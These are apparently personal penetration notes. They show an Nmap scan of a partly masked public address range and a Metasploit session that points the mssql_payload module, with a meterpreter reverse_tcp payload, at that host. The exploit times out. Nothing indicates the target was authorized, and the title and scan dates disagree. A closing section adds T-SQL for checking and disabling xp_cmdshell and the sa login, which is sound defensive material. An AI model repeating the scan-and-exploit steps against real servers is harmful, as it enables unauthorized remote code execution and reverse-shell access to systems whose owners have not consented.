Penetration notes - 2013-07-13 - windows/mssql/mssql_payload

Source: Internet
Author: User
Tags: mssql, microsoft, iis, cve, mitre

Scan:

Starting Nmap 5.30BETA1 (http://nmap.org) at 2011-05-06 09:36 China Standard Time
NSE: Loaded scripts for scanning.
Initiating Ping Scan at 09:36
Scanning 203.171.239.* [4 ports]
Completed Ping Scan at 09:36, 0.90s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 09:36
Completed Parallel DNS resolution of 1 host. at 09:36, 0.03s elapsed
Initiating SYN Stealth Scan at 09:36
Scanning 203.171.239.* [ports]
Discovered open port 3389/tcp on 203.171.239.*
Discovered open port 80/tcp on 203.171.239.*
Discovered open port 3306/tcp on 203.171.239.*
Discovered open port 21/tcp on 203.171.239.*
Completed SYN Stealth Scan at 09:36, 33.18s elapsed (+ total ports)
Initiating Service scan at 09:36
Scanning 4 services on 203.171.239.*
Completed Service scan at 09:37, 6.07s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 203.171.239.*
Retrying OS detection (try #2) against 203.171.239.*
Initiating Traceroute at 09:37
Completed Traceroute at 09:37, 0.06s elapsed
Initiating Parallel DNS resolution of 1 host. at 09:37
Completed Parallel DNS resolution of 1 host. at 09:37, 0.03s elapsed
NSE: Script scanning 203.171.239.*.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 09:37
Completed NSE at 09:37, 5.22s elapsed
NSE: Script Scanning completed.
Nmap scan report for 203.171.239.*
Host is up (0.043s latency).
Not shown: 994 filtered ports
PORT     STATE  SERVICE       VERSION
21/tcp   open   ftp           Microsoft ftpd
25/tcp   closed smtp
80/tcp   open   http          Microsoft IIS httpd
|_http-methods: No Allow or Public header in OPTIONS response (status code)
|_html-title: Site doesn't have a title (text/html).
110/tcp  closed pop3
3306/tcp open   mysql         MySQL 5.1.32-community
| mysql-info: Protocol: 10
| Version: 5.1.32-community
| Thread ID: 30457
| Some Capabilities: Long Passwords, Connect with DB, Compress, ODBC, Transactions, Secure Connection
| Status: Autocommit
|_Salt: <*[k+0o~o[...];By^j5k
3389/tcp open   microsoft-rdp Microsoft Terminal Service
Device type: general purpose|media device
Running (JUST GUESSING): Microsoft Windows 2003|XP (93%), Motorola Windows PocketPC/CE (85%)
Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (93%), Microsoft Windows Server 2003 SP1 (92%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows XP Professional SP3 (85%), Microsoft Windows XP SP2 (85%), Microsoft Windows XP SP3 (85%), Motorola VIP1216 digital set top box (Windows CE 5.0) (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: Busy server or unknown class
Service Info: OS: Windows

TRACEROUTE (using port 25/tcp)
HOP RTT      ADDRESS
1   50.00 ms 203.171.239.*

Read data files from: d:\metasploit\nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.32 seconds
           Raw packets sent: 2095 (95.768KB) | Rcvd: 251 (223.649KB)

Now to work.

Welcome to the Metasploit Web Console!

[Metasploit ASCII-art banner]

       =[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 566 exploits - 283 auxiliary
+ -- --=[ payloads - 27 encoders - 8 nops
       =[ svn r9834 updated 296 days ago (2010.07.14)

Warning: This copy of the Metasploit Framework was last updated 296 days ago.
         We recommend that you update the framework at least every day.
         For information on updating your copy of Metasploit, please see:
             http://www.metasploit.com/redmine/projects/framework/wiki/Updating

>> use windows/mssql/mssql_payload
>> info windows/mssql/mssql_payload

       Name: Microsoft SQL Server Payload Execution
    Version: 9669
   Platform: Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent

Provided by:
  David Kennedy "ReL1K" <kennedyd013@gmail.com>
  jduck <jduck@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   Automatic

Basic options:
  Name          Current Setting  Required  Description
  ----          ---------------  --------  -----------
  PASSWORD                       no        The password for the specified username
  RHOST                          yes       The target address
  RPORT         1433             yes       The target port
  USERNAME      sa               no        The username to authenticate as
  UseCmdStager  true             no        Wait for user input before returning from exploit
  VERBOSE       false            no        Enable verbose output

Payload information:

Description:
  This module will execute an arbitrary payload on a Microsoft SQL
  Server, using the Windows debug.com method for writing an executable
  to disk and the xp_cmdshell stored procedure. File size restrictions
  are avoided by incorporating the debug bypass method presented at
  Defcon by SecureState. Note that this module will leave a Metasploit
  payload in the Windows System32 directory which must be manually
  deleted once the attack is completed.

References:
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=2000-0402
  http://www.osvdb.org/557
  http://www.securityfocus.com/bid/1281
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=2000-1209
  http://www.osvdb.org/15757
  http://www.securityfocus.com/bid/4797
  http://www.thepentest.com/presentations/FastTrack_ShmooCon2009.pdf

>> use windows/mssql/mssql_payload
>> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
>> show options

Module options:
  Name          Current Setting  Required  Description
  ----          ---------------  --------  -----------
  PASSWORD                       no        The password for the specified username
  RHOST                          yes       The target address
  RPORT         1433             yes       The target port
  USERNAME      sa               no        The username to authenticate as
  UseCmdStager  true             no        Wait for user input before returning from exploit
  VERBOSE       false            no        Enable verbose output

Payload options (windows/meterpreter/reverse_tcp):
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  EXITFUNC  process          yes       Exit technique: seh, thread, process
  LHOST                      yes       The listen address
  LPORT     4444             yes       The listen port

Exploit target:
  Id  Name
  --  ----
  0   Automatic

>> set RHOST 203.171.239.*
RHOST => 203.171.239.*
>> set LHOST 172.16.2.101
LHOST => 172.16.2.101
>> exploit

[*] Started reverse handler on 172.16.2.101:4444
[-] Exploit failed: The connection timed out (203.171.239.*:1433).
[*] Exploit completed, but no session was created.
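The module description above names the two things it depends on: the xp_cmdshell stored procedure being callable, and (by default) authenticating as the built-in sa login. In this run the attempt never got that far, because TCP 1433 was not reachable (the scan listed it among the filtered ports and the exploit timed out on connect). The T-SQL below is an added hardening and verification script, not part of the original notes or of the Metasploit module; it assumes a sysadmin connection to the SQL Server instance being reviewed and uses only standard catalog views and sp_configure options.

```sql
-- Added example (not from the original notes): verify and remove the
-- preconditions the mssql_payload module needs on a SQL Server instance.

-- 1. Is xp_cmdshell enabled?  value_in_use = 1 means yes.
SELECT name, value, value_in_use
FROM   sys.configurations
WHERE  name IN ('xp_cmdshell', 'show advanced options');

-- 2. Is the default "sa" login still enabled?  The module authenticates
--    as sa unless USERNAME is changed; sa always has SID 0x01.
SELECT name, is_disabled, is_policy_checked, is_expiration_checked
FROM   sys.sql_logins
WHERE  sid = 0x01;

-- 3. Remediate: turn xp_cmdshell off (it is an advanced option, so expose
--    the switch first, then hide advanced options again).
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 4. Remediate: disable the sa login and rely on named sysadmin logins.
--    (Do this only after confirming another sysadmin login works.)
ALTER LOGIN sa DISABLE;

-- 5. Re-check: expect value_in_use = 0 for xp_cmdshell and is_disabled = 1 for sa.
SELECT name, value_in_use FROM sys.configurations WHERE name = 'xp_cmdshell';
SELECT name, is_disabled  FROM sys.sql_logins     WHERE sid = 0x01;
```

Steps 1 and 2 are safe to run on any instance; steps 3 and 4 change configuration and should be scheduled like any other change. Note that disabling xp_cmdshell via sp_configure can be undone by any sysadmin, so the check in step 1 belongs in periodic configuration monitoring, and the network-level exposure of 1433 (which is what actually blocked this attempt) should be reviewed alongside it.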
